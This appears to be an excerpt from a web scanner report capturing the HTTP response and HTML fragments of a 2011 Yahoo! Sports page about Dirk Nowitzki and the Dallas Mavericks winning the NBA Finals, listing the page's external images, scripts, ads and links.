http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307677853.jpg?x=94&y=63&xc=13&yc=1&wc=350&hc=235&q=100&sig=_7Ph44gxlCqLT7uQYXoBQg--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307722364.gif?x=94&y=63&xc=1&yc=1&wc=220&hc=147&q=100&sig=WMd9OccAwMTzQnWUVZpv5g--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307852871.jpg?x=94&y=63&xc=1&yc=1&wc=220&hc=147&q=100&sig=pSs3IwCg5jz8cCv94n_7Qw--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307855496.jpg?x=94&y=63&xc=1&yc=1&wc=180&hc=120&q=100&sig=fBEIDS2ocjb7Na3dci2q1w--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307858429.jpg?x=94&y=63&xc=1&yc=1&wc=200&hc=134&q=100&sig=XyvTu0c9VsrVHGCR3997bA--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307937492.jpg?x=198&y=136&xc=1&yc=1&wc=220&hc=151&q=100&sig=TR.XYVYO4ZmKsIIgKwVMcQ--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307938675.jpg
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307947097.jpg?x=94&y=63&xc=1&yc=1&wc=180&hc=120&q=100&sig=Ec2FAhGBmbcGt5yb1E1q7A--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307948894.jpg?x=94&y=63&xc=43&yc=1&wc=326&hc=219&q=100&sig=Xvl4l0f_TVE.F1uSsI4ZHw--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955445.jpg
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955591.jpg
http://l.yimg.com/j/assets/css/video/dash-players/ysp-dash-players.r172932.css?m
http://l.yimg.com/j/assets/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css?z&m
http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m
http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/answers_badge_1.5.r143221;js/teamtracker.r143221.js?m
http://l.yimg.com/j/assets/js/video/dash-players/yep-player.r169686;js/video/dash-players/dash-players.r170778;js/video/dash-players/dash-players-init.r172129.js?m
http://l.yimg.com/j/assets/print_css/article.r158641.css?m
http://l.yimg.com/zz/combo?kx/ucs/uh/css/205/yunivhead-min.css&kx/ucs/uh/css/194/logo-min.css&kx/ucs/search/css/163/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css
http://twitter.com/WojYahooNBA
http://twitter.com/home?status=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
http://www.facebook.com/sharer.php?u=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&title=Perseverance+pays+off+for+Nowitzki%2C+Mavs&ts=1307962853
http://yahoosports.teamfanshop.com/NBA_Basketball
http://yhoo.it/j7vXPD
http://yhoo.it/jSvQmx
http://yhoo.it/mAVQQC

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:00:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r1.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 139675

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Perseverance pays off for Nowitzki, Mavs - NBA - Yahoo! Sports</title>
<meta http-e
...[SNIP]...
<meta name="description" content="While LeBron James wallows in failure, Dirk Nowitzki is rewarded for being the consummate blue-collar employee. - National Basketball Association news"/>
<link type="text/css" rel="stylesheet" media="screen" href="http://l.yimg.com/j/assets/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css?z&m" />
<link type="text/css" rel="stylesheet" media="print" href="http://l.yimg.com/j/assets/print_css/article.r158641.css?m" />

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m"></script>
...[SNIP]...
<meta property="og:title" content="Perseverance pays off for Nowitzki, Mavs" />
<link rel="image_src" href="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955445.jpg" />
<link rel="canonical" href="http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311" />
...[SNIP]...
<meta name="msapplication-task" content="name=Photos;action-uri=http://sports.yahoo.com/nba/gallery;icon-uri=http://sports.yahoo.com/favicon.ico" />
<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/css/video/dash-players/ysp-dash-players.r172932.css?m" />

<STYLE>
...[SNIP]...
<h2 id="yahoo-image-logo"><img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-print-logo.png" alt="Yahoo! Sports" /></h2>
...[SNIP]...
<div id="ysp-hd">

<link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/205/yunivhead-min.css&kx/ucs/uh/css/194/logo-min.css&kx/ucs/search/css/163/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css'/><style>
...[SNIP]...
<div id="ad-362051" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487"></script>
...[SNIP]...
<div class="hd">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/05/ipt/1306711597.jpg" />

<h1 property="dc:title">
...[SNIP]...
<div class="byline">
<img src="http://l.yimg.com/a/i/us/sp/ed/experts/wojnarowski.png" alt="Adrian Wojnarowski" />
<div rel="dc:creator">
...[SNIP]...
<param name="flashVars" value="vid=25587086"><embed width="576" height="324" allowfullscreen="true" src="http://d.yimg.com/nl/yahoo%20sports/site/player.swf" type="application/x-shockwave-flash" flashvars="vid=25587086"></object>
...[SNIP]...
<li class="B"><a href="http://yhoo.it/mAVQQC" >Wetzel: LeBron's failure warms Cleveland's heart</a>
...[SNIP]...
<li class="B"><a href="http://yahoosports.teamfanshop.com/NBA_Basketball" target="_new">Buy championship gear</a>
...[SNIP]...
<div id="ad-862421" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"> <script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487"> </script>
...[SNIP]...
<div class="inline_photo inline_photo_right" style="width: 180px">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955445.jpg"/> <div class="caption">
...[SNIP]...
<div class="inline_photo inline_photo_right" style="width: 325px">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955591.jpg"/> <div class="caption">
...[SNIP]...
<br />
• <a href="http://yhoo.it/j7vXPD">Twins’ Francisco Liriano loses no-no after long wait</a><br />
• <a href="http://yhoo.it/jSvQmx">Jeff Gordon notches historic win at Pocono</a>
...[SNIP]...
<br />
• <a href="http://bit.ly/lhnZPc">Pete Carroll scolds NCAA for penalizing current USC players</a>
...[SNIP]...
<div class="author">Adrian Wojnarowski is the NBA columnist for Yahoo! Sports. <a href="http://twitter.com/WojYahooNBA" target="new">Follow him on Twitter</a>
...[SNIP]...

<a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&title=Perseverance+pays+off+for+Nowitzki%2C+Mavs&ts=1307962853" class="digg" title="Digg.com" target="_new">digg</a>
...[SNIP]...

<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&title=Perseverance+pays+off+for+Nowitzki%2C+Mavs&ts=1307962853" class="facebook" title="Facebook" target="_new">add to facebook</a>
...[SNIP]...

<a href="http://twitter.com/home?status=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311" class="twitter" title="Twitter" target="_new">Twitter</a>
...[SNIP]...
<div class="super-thumb">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307937492.jpg?x=198&y=136&xc=1&yc=1&wc=220&hc=151&q=100&sig=TR.XYVYO4ZmKsIIgKwVMcQ--" title="Mavericks win first NBA title, oust Heat" alt="Mavericks win first NBA title, oust Heat" class="thumb-img" width="198" height="136">
<span class="text-bars">
...[SNIP]...
<div class="super-thumb">
<img src="http://d.yimg.com/a/p/sp/ap/99/fullj.8f741bf99581b1f598f4bbd0ccac4f13/ap-201105301352499683518.jpg?x=198&y=136&xc=44&yc=1&wc=353&hc=243&q=100&sig=E7mAhtCIVwOCNe2DzFMJTA--" title="1 win from title, Mavs not excited yet" alt="1 win from title, Mavs not excited yet" class="thumb-img" width="198" height="136">
<span class="text-bars">
...[SNIP]...
<div class="super-thumb">
<img src="http://d.yimg.com/a/p/sp/getty/9f/fullj.f3465156c4a1d8a9bd40907a552f9ac1/f3465156c4a1d8a9bd40907a552f9ac1-getty-114832789mw134_dallas_maver.jpg?x=198&y=136&xc=11&yc=1&wc=640&hc=440&q=100&sig=4Wg8UWZyVI3MM3XRtxqJOA--" title="Still no crown for LeBron" alt="Still no crown for LeBron" class="thumb-img" width="198" height="136">
<span class="text-bars">
...[SNIP]...
53/L=SSzZZEwNdHHm3NorTdAdCwM8rcHW80317eUAB.4z/B=tcwCHkwNPGE-/J=1307962853703487/K=bSqWFUWXYNJCrV4IxKTzqg/A=6418146/R=0/SIG=11j13n4o5/*http://football.fantasysports.yahoo.com/f1/signup" target="_blank"><img src="http://ads.yimg.com/a/a/ya/yahoo_sports8/yahoo!_fantasy_football11_smb_630x31.jpg" alt="click here" width="630" height="31" border="0"></a>
...[SNIP]...
<h4><a href="http://26594.r.msn.com/?ld=4v26U3wpV9QLcOJeqZp9VE9F7iE_JGuHAEqSYJ5C1_a5njEtel9Ryw2d6BESW4mTQd4CSbIc-zUfYLR-_ohQHfiTatmAxe9oWOvYSRYsRfi3mTYSv8AdkqI7g8oLvmfVVgHxY1EtR5mHDAsGdvSp4cjCZ1yXcEXz7rYprlM_9Nw2XhJLA9X5oJ0CQS3dZnn7AZBrGZVDiTgQVquUQgn9K3Do6koy47SY23E1LgF8e2OZBefyZDa7PR8K2s89E4znWnOOXhCpJ8WGTGDi8NXlFtvIjs2TmG7OewyJxoybbKU3k1VAlMuq85LMo_g-5nMUQ3HWlkQxAmY3M9l5Zzfa0Gqi-dTqrzigHjvFpFTtYlruI1gSpLRStJ7n0">Oklahoma City Flowers</a>
...[SNIP]...
<p class="iysmcm-desc ysmcm-desc"><a href="http://26594.r.msn.com/?ld=4v26U3wpV9QLcOJeqZp9VE9F7iE_JGuHAEqSYJ5C1_a5njEtel9Ryw2d6BESW4mTQd4CSbIc-zUfYLR-_ohQHfiTatmAxe9oWOvYSRYsRfi3mTYSv8AdkqI7g8oLvmfVVgHxY1EtR5mHDAsGdvSp4cjCZ1yXcEXz7rYprlM_9Nw2XhJLA9X5oJ0CQS3dZnn7AZBrGZVDiTgQVquUQgn9K3Do6koy47SY23E1LgF8e2OZBefyZDa7PR8K2s89E4znWnOOXhCpJ8WGTGDi8NXlFtvIjs2TmG7OewyJxoybbKU3k1VAlMuq85LMo_g-5nMUQ3HWlkQxAmY3M9l5Zzfa0Gqi-dTqrzigHjvFpFTtYlruI1gSpLRStJ7n0">Same Day Oklahoma City Flower Delivery. Family Owned and Operated!</a></p><a href="http://26594.r.msn.com/?ld=4v26U3wpV9QLcOJeqZp9VE9F7iE_JGuHAEqSYJ5C1_a5njEtel9Ryw2d6BESW4mTQd4CSbIc-zUfYLR-_ohQHfiTatmAxe9oWOvYSRYsRfi3mTYSv8AdkqI7g8oLvmfVVgHxY1EtR5mHDAsGdvSp4cjCZ1yXcEXz7rYprlM_9Nw2XhJLA9X5oJ0CQS3dZnn7AZBrGZVDiTgQVquUQgn9K3Do6koy47SY23E1LgF8e2OZBefyZDa7PR8K2s89E4znWnOOXhCpJ8WGTGDi8NXlFtvIjs2TmG7OewyJxoybbKU3k1VAlMuq85LMo_g-5nMUQ3HWlkQxAmY3M9l5Zzfa0Gqi-dTqrzigHjvFpFTtYlruI1gSpLRStJ7n0" class="iysmcm-url ysmcm-url yltasis">www.FlowerShopping.com/OklahomaCity</a>
...[SNIP]...
<h4><a href="http://154875.r.msn.com/?ld=4vkTsjzBFcOh8SDKBlpA6B-kMY1zI5C3oWaUUHMF-Gz9a6crz6s2sOi9TKYPIdsH2QRRBwOMIilOUqojSKPDxh5Xz1nXZ3N14WKwJOnV2wOLFJdKfqVOUnpwCLEh-cBa75dEOPta8hzgetBQPWVJVs1ZT_AMZ91bd4kTbIhiu7MuMttRK86N8LxxskgvTIS2dVyZFRdt-qxrilPCGJmp3Jyoyqu2ozAQFvlYtyqxtxMyddCRtSftWYb3SSfDligFYCnc1lGk70--KCTl_BqfXfpTVUCUxr-9XR8Cw109BwZwQOR9vCECZjcz3l6aIfZjQ4PBaxxcmAwucQ77_ZdhVBTaTVHW3fKqfQ_Q">Fly To Oklahoma</a>
...[SNIP]...
<p class="iysmcm-desc ysmcm-desc"><a href="http://154875.r.msn.com/?ld=4vkTsjzBFcOh8SDKBlpA6B-kMY1zI5C3oWaUUHMF-Gz9a6crz6s2sOi9TKYPIdsH2QRRBwOMIilOUqojSKPDxh5Xz1nXZ3N14WKwJOnV2wOLFJdKfqVOUnpwCLEh-cBa75dEOPta8hzgetBQPWVJVs1ZT_AMZ91bd4kTbIhiu7MuMttRK86N8LxxskgvTIS2dVyZFRdt-qxrilPCGJmp3Jyoyqu2ozAQFvlYtyqxtxMyddCRtSftWYb3SSfDligFYCnc1lGk70--KCTl_BqfXfpTVUCUxr-9XR8Cw109BwZwQOR9vCECZjcz3l6aIfZjQ4PBaxxcmAwucQ77_ZdhVBTaTVHW3fKqfQ_Q">No Hanky-Panky! Just Compare Flights To Oklahoma & Save Huge!</a></p><a href="http://154875.r.msn.com/?ld=4vkTsjzBFcOh8SDKBlpA6B-kMY1zI5C3oWaUUHMF-Gz9a6crz6s2sOi9TKYPIdsH2QRRBwOMIilOUqojSKPDxh5Xz1nXZ3N14WKwJOnV2wOLFJdKfqVOUnpwCLEh-cBa75dEOPta8hzgetBQPWVJVs1ZT_AMZ91bd4kTbIhiu7MuMttRK86N8LxxskgvTIS2dVyZFRdt-qxrilPCGJmp3Jyoyqu2ozAQFvlYtyqxtxMyddCRtSftWYb3SSfDligFYCnc1lGk70--KCTl_BqfXfpTVUCUxr-9XR8Cw109BwZwQOR9vCECZjcz3l6aIfZjQ4PBaxxcmAwucQ77_ZdhVBTaTVHW3fKqfQ_Q" class="iysmcm-url ysmcm-url yltasis">www.TripMama.com/Flights</a>
...[SNIP]...
<h4><a href="http://948702.r.msn.com/?ld=4vLhX0f9-KQKXhGdGjfYVTxU062QBxZUmcfu1d4qru6k8Pb0lNsnoIaJNb89P4iTA-cPsd1cBemBe0MRh8SZyqJsrU4wHcAyOJXp5wX1VsPIqTc_k4wnFl8gKYLAGRVGUf1YKXzIQFfuRG5ykEgQVkAgVt7HL-pOx3ncPl1_Hvlyjxf-IpyWdLvBm4udicLRKUv-0XF31O_sHYxSsypkWFIpCsiqHAvyt_6U2aMm48M-c1VAlM3A1YN7mn6na-sOSH2ey76BAmY3M91lkrBjFwr8mAK8OuyYN-Mqrsakx_0gXBOG2d7bRSBws">Breaking News:$25 Car Ins</a>
...[SNIP]...
<p class="iysmcm-desc ysmcm-desc"><a href="http://948702.r.msn.com/?ld=4vLhX0f9-KQKXhGdGjfYVTxU062QBxZUmcfu1d4qru6k8Pb0lNsnoIaJNb89P4iTA-cPsd1cBemBe0MRh8SZyqJsrU4wHcAyOJXp5wX1VsPIqTc_k4wnFl8gKYLAGRVGUf1YKXzIQFfuRG5ykEgQVkAgVt7HL-pOx3ncPl1_Hvlyjxf-IpyWdLvBm4udicLRKUv-0XF31O_sHYxSsypkWFIpCsiqHAvyt_6U2aMm48M-c1VAlM3A1YN7mn6na-sOSH2ey76BAmY3M91lkrBjFwr8mAK8OuyYN-Mqrsakx_0gXBOG2d7bRSBws">Do Not Buy Car Insurance until you see this shocking report!</a></p><a href="http://948702.r.msn.com/?ld=4vLhX0f9-KQKXhGdGjfYVTxU062QBxZUmcfu1d4qru6k8Pb0lNsnoIaJNb89P4iTA-cPsd1cBemBe0MRh8SZyqJsrU4wHcAyOJXp5wX1VsPIqTc_k4wnFl8gKYLAGRVGUf1YKXzIQFfuRG5ykEgQVkAgVt7HL-pOx3ncPl1_Hvlyjxf-IpyWdLvBm4udicLRKUv-0XF31O_sHYxSsypkWFIpCsiqHAvyt_6U2aMm48M-c1VAlM3A1YN7mn6na-sOSH2ey76BAmY3M91lkrBjFwr8mAK8OuyYN-Mqrsakx_0gXBOG2d7bRSBws" class="iysmcm-url ysmcm-url yltasis">CarInsurancee-Quotes.com</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=mc-spears_heat_failed_lebron_james_dwyane_wade_061311&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="LeBron hate continues">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307948894.jpg?x=94&y=63&xc=43&yc=1&wc=326&hc=219&q=100&sig=Xvl4l0f_TVE.F1uSsI4ZHw--" title="LeBron hate continues" alt="LeBron hate continues" width="94" height="63">
</a>
...[SNIP]...
m/soccer/blog/dirty-tackle/post/Why-goalkeepers-shouldn-8217-t-be-too-quick-to-?urn=sow-wp2377&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Goalie's costly celebration">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/08/goalie.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=TlV8qtCIHSkJYCX8s7qSeg--" title="Goalie's costly celebration" alt="Goalie's costly celebration" width="94" height="63">
</a>
...[SNIP]...
//sports.yahoo.com/nba/news?slug=dw-wetzel_cleveland_laughs_at_lebron_james_061211&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="LeBron's failure warms Cleveland hearts">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307947097.jpg?x=94&y=63&xc=1&yc=1&wc=180&hc=120&q=100&sig=Ec2FAhGBmbcGt5yb1E1q7A--" title="LeBron's failure warms Cleveland hearts" alt="LeBron's failure warms Cleveland hearts" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=ap-nbafinals-markcuban&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Cuban humble after win">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
l_dont_lie/post/Video-Emotional-Dirk-Nowitzki-runs-into-the-loc?urn=nba-wp4846&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Why Dirk Nowitzki left the NBA Finals early">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/d2.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=kZLWzEBuB5OIti.wD3qccQ--" title="Why Dirk Nowitzki left the NBA Finals early" alt="Why Dirk Nowitzki left the NBA Finals early" width="94" height="63">
</a>
...[SNIP]...
all_dont_lie/post/Dallas-downs-the-Heat-takes-home-its-first-NBA-?urn=nba-wp4840&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Dallas wins NBA title in decisive fashion">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/mavs.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=u5SPXj_CUd8f7TwwUIjXZQ--" title="Dallas wins NBA title in decisive fashion" alt="Dallas wins NBA title in decisive fashion" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=ap-nbafinals-heat&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Still no crown for LeBron">
<img src="http://d.yimg.com/a/p/sp/getty/9f/fullj.f3465156c4a1d8a9bd40907a552f9ac1/f3465156c4a1d8a9bd40907a552f9ac1-getty-114832789mw134_dallas_maver.jpg?x=94&y=63&xc=3&yc=1&wc=656&hc=440&q=100&sig=attJqgVCcbWX5fJecGk9.A--" title="Still no crown for LeBron" alt="Still no crown for LeBron" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=ys-nba_finals_history_2011&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="NBA Finals winners, MVPs">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
s.yahoo.com/nba/blog/ball_dont_lie/post/Video-Mavs-and-Heat-tussle-a-bit-at-midcourt?urn=nba-wp4828&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Tussle mars first half">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/mavs.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=u5SPXj_CUd8f7TwwUIjXZQ--" title="Tussle mars first half" alt="Tussle mars first half" width="94" height="63">
</a>
...[SNIP]...
all_dont_lie/post/Odd-photo-starts-internet-uproar-over-LeBron-82?urn=nba-wp4819&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Photo of LeBron James creates stir on Web">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/lebron-big.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=uIeKaizVW.RdorgryBe0Sg--" title="Photo of LeBron James creates stir on Web" alt="Photo of LeBron James creates stir on Web" width="94" height="63">
</a>
...[SNIP]...
shutdown_corner/post/Tom-Brady-8217-s-mentor-given-one-month-to-live?urn=nfl-wp2566&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Sad health news for Tom Brady's mentor">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/brady.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=6Px4mV9VHyfgCJ68lZsJXA--" title="Sad health news for Tom Brady's mentor" alt="Sad health news for Tom Brady's mentor" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-dolphins-marshall&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="NFL star's wife in jail">
<img src="http://d.yimg.com/a/p/sp/getty/74/fullj.be3dd8e493d12661a6c3c69da6bd27b7/be3dd8e493d12661a6c3c69da6bd27b7-getty-_dolphin.jpg?x=94&y=63&xc=1&yc=1&wc=660&hc=442&q=100&sig=SLg3JcDSSPtWv01t0JhaVw--" title="NFL star's wife in jail" alt="NFL star's wife in jail" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-eagles-vick-graduation&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Vick surprises 2 grads with scholarships">
<img src="http://d.yimg.com/a/p/sp/ap/5e/fullj.261e7f944cfd25545b56930f1a2c06f3/ap-201106081242457246066.jpg?x=94&y=63&xc=1&yc=1&wc=349&hc=233&q=100&sig=DQRWzZOA498_5jeJ8SOypQ--" title="Vick surprises 2 grads with scholarships" alt="Vick surprises 2 grads with scholarships" width="94" height="63">
</a>
...[SNIP]...
irty-tackle/post/Eric-Hassli-scores-the-MLS-goal-of-the-season-so?urn=sow-wp2446&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Is this the best soccer goal of the year?">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/goal.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=ljrQeiwcSj_mrmcVg4ATtg--" title="Is this the best soccer goal of the year?" alt="Is this the best soccer goal of the year?" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/sow/news?slug=ro-rogers_gold_cup_panama_defeats_usa_061111&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="U.S. team's ugly loss">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307858429.jpg?x=94&y=63&xc=1&yc=1&wc=200&hc=134&q=100&sig=XyvTu0c9VsrVHGCR3997bA--" title="U.S. team's ugly loss" alt="U.S. team's ugly loss" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/sow/news?slug=ap-mexico-playerssuspended&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Mexico's soccer scandal">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/golf_experts/post/Tiger-Woods-8217-caddie-on-Adam-Scott-8217-s-?urn=golf-wp2533&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="New gig for Tiger Woods's longtime caddie">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/tiger1.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=dIURv6ZGoyUZZmWzhyuzVg--" title="New gig for Tiger Woods's longtime caddie" alt="New gig for Tiger Woods's longtime caddie" width="94" height="63">
</a>
...[SNIP]...
.com/golf/blog/golf_experts/post/Monty-predicts-Europeans-are-about-to-dominate-t?urn=golf-wp2535&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Golfer's bold prediction">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=jy-ludden_dirk_nowitzki_nba_finals_coughing_061111&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Dirk fires back at Mavs">
